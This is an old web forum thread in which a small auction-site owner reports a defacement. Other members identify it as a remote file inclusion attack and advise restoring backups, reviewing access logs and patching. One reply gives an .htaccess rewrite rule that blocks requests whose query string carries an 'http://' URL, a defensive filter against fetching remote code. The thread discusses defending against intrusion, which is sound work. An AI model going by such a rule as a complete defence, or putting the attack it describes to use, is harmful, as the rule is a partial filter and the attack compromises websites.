Ravens PHP Scripts: Forums
 

 

View next topic
View previous topic
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - Other
Author Message
Serafim
Worker
Worker


Joined: Mar 25, 2006
Posts: 109
Location: Delaware Usa

PostPosted: Sun Oct 28, 2007 3:13 pm Reply with quote

Well I haven't been on here in a while but I could sure use some help. I run an online auction Called herps4sale.com We are a simple site dedicated to hobbyist reptile keepers. I got this great message on my index page this afternoon

Hacked By kentunk
Indonesia Hacker Community
#sekuritionline #generation-x @ Dal.net

Warning: Cannot modify header information - headers already sent by (output started at /home/herps4sa/public_html/includes/config.inc.php:3) in /home/herps4sa/public_html/header.php on line 4

Warning: Cannot modify header information - headers already sent by (output started at /home/herps4sa/public_html/includes/config.inc.php:3) in /home/herps4sa/public_html/header.php on line 5

Warning: Cannot modify header information - headers already sent by (output started at /home/herps4sa/public_html/includes/config.inc.php:3) in /home/herps4sa/public_html/header.php on line 6

Warning: Cannot modify header information - headers already sent by (output started at /home/herps4sa/public_html/includes/config.inc.php:3) in /home/herps4sa/public_html/header.php on line 7

Warning: Cannot modify header information - headers already sent by (output started at /home/herps4sa/public_html/includes/config.inc.php:3) in /home/herps4sa/public_html/header.php on line 8

Warning: mysql_query(): Access denied for user: 'nobody@localhost' (Using password: NO) in /home/herps4sa/public_html/maintenance.php on line 10

Warning: mysql_query(): A link to the server could not be established in /home/herps4sa/public_html/maintenance.php on line 10
Error: SELECT * FROM PHPAUCTIONXL_statssettings
Access denied for user: 'nobody@localhost' (Using password: NO)

I am not sure what happened, I assume someone accessed my config file and figured out where the password is located. I need to see what I can do to protect these files. I cannot remember what Chmod to place on such files. I did not set this site up I paid to have this done. The person that hosts me has yet to get back with me. I am sure she is aware of the issue as the index page was corrected. Anyone interested in helping me fix this please let me know. I am really not sure what would happen if I changed the chmod. Im not sure if it will break the site. But I know alot of damage was done and it cost me alot. Not to mention the embarrassment factor

_________________
Image 
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
evaders99
Former Moderator in Good Standing


Joined: Apr 30, 2004
Posts: 3221

PostPosted: Sun Oct 28, 2007 6:40 pm Reply with quote

It is possible they changed your config file. If you have a file backup, you'll need to restore clean files. They also may have changed data in your database.

Really it is best you restore from a clean backup. And figure out how they got in and patch it. You will need to go through your access logs to determine how they got in.

If you haven't yet, secure your site with the latest Patched files and Nuke Sentinel. Or just switch to RavenNuke Smile

_________________
- Only registered users can see links on this board! Get registered or login! -

Need help? Only registered users can see links on this board! Get registered or login! 
View user's profile Send private message Visit poster's website
Serafim
PostPosted: Sun Oct 28, 2007 6:55 pm Reply with quote

Thanks evaders but the site is not a nuke site its php based but a totally seperate program. I did find where an odd log entry came in. It was a script called kiddies/safe.txt?

I can't find anything about it and cannot understand where it was installed or how. I have a copy of the script I located Only registered users can see links on this board! Get registered or login!

But again I do not understand what it means The attack originated from 200.160.240.34. Any help would be appreciated
 
Dawg
RavenNuke(tm) Development Team


Joined: Nov 07, 2003
Posts: 910

PostPosted: Mon Oct 29, 2007 3:36 am Reply with quote

Only registered users can see links on this board! Get registered or login!

We have been seeing alot of these as of late. They are called remote file inclusion attack(I think) What they do is try to include the code in the txt file so it is run on your site. IF the attack originated from 200.160.240.34 then that is the IP where the request came from.

You culd ban that IP but it will not do much good. They can just change the IP. Restoreing the site from Back-Up is the best way to get started. Once the restore is done...finding what was hit is the next step and how to stop it.

Without knowing the site or the setup it is really hard to point you in the right direction. I can tell you that RN (Sentinal Really) stops all of these kinds attacks. Maybe it is time to do a rebuild based on RN. On my own Nuke sites I bet I see 100 attacks like this a day.

Dawg


Last edited by Dawg on Mon Oct 29, 2007 11:32 am; edited 1 time in total 
View user's profile Send private message
fkelly
Former Moderator in Good Standing


Joined: Aug 30, 2005
Posts: 3312
Location: near Albany NY

PostPosted: Mon Oct 29, 2007 7:27 am Reply with quote

Quote:
the site is not a nuke site its php based but a totally seperate program


Nuke Sentinel will not help you then. You really need to get the person who set this up to fix it and you need him/her to determine how the attack got in and put security in place to keep it from happening again.
 
View user's profile Send private message Visit poster's website
evaders99
PostPosted: Mon Oct 29, 2007 10:10 am Reply with quote

Yes the safe.txt is the beginning of a remote file inclusion attack. This script doesn't really show us how you were infected. Access logs would be able to show all activity from 200.160.240.34

Whatever PHP script you are using, you'll need to find the vulnerability and patch it.
 
slackervaara
Worker
Worker


Joined: Aug 26, 2007
Posts: 236

PostPosted: Mon Oct 29, 2007 12:33 pm Reply with quote

Could not protection against cross scripting be made through the .htaccess file and modrewrite? I have included this in my .htaccess:

RewriteEngine on

RewriteCond %{QUERY_STRING} .*http:\/\/.*
Rewriterule ^.* - [F]
 
View user's profile Send private message
Serafim
PostPosted: Mon Oct 29, 2007 2:56 pm Reply with quote

Well thanks for all te replies. Today is looking much better. All the site is restored. And security has been added at server level. I am told the attack first happened to another site on our server. My site structure is similar in content so once they knew where to look the rest was history. I am thankful my site did not end up like 12 others that saw far worse damage. I am looking into a better server with more security. Problem here is that my software is very resource intensive. So Most hosting providers cannot handle the load or do not want to bog down the server.

Thanks for all the help
 
evaders99
PostPosted: Mon Oct 29, 2007 6:22 pm Reply with quote

Personally I would recommend a dedicated host. It may be above your budget, but it allows you to handle very database-intensive sites and install your own software for security.

I've been using 1and1's Root Servers Only registered users can see links on this board! Get registered or login!

(I don't think Raven offers this kind of hosting. If so, then please feel free to delete the 1and1 link)
 
Display posts from previous:       
Post new topic   Reply to topic    Ravens PHP Scripts And Web Hosting Forum Index -> Security - Other

View next topic
View previous topic
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Powered by phpBB © 2001-2007 phpBB Group
All times are GMT - 6 Hours
 
Forums ©